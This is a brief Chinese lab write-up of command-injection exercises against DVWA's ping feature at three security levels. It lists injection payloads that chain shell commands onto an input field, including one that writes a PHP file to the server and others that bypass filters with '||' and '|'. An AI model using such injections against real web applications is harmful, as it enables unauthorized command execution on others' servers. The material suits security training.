实验环境:DVWA、Apache、php5.2
实验原理:
日常的网络访问中,我们常常可以看到某些Web网站具有执行系统命令的功能,比如:有些网站提供ping功能,我们可以输入一个IP地址,它就会帮我们去尝试ping目标的IP地址,而我们则可以看到执行结果。但是如果用户没有遵循网站的本意,而去输入精心构造的指令,可能会对网站本身的功能逻辑产生逆转,导致让目标网站执行恶意命令。
实验步骤:
实验一:低级别DVWA
1.在输入框输入:www.baidu.com && echo "<?php phpinfo()?>" > 1.php,可看到命令执行成功
2.访问php文件
实验二:中级别DVWA
输入:www,nbj.jhg || ipconfig,可看到命令执行成功
实验三:高级别DVWA
输入:www,nbj.jhg |ipconfig,可看到命令执行成功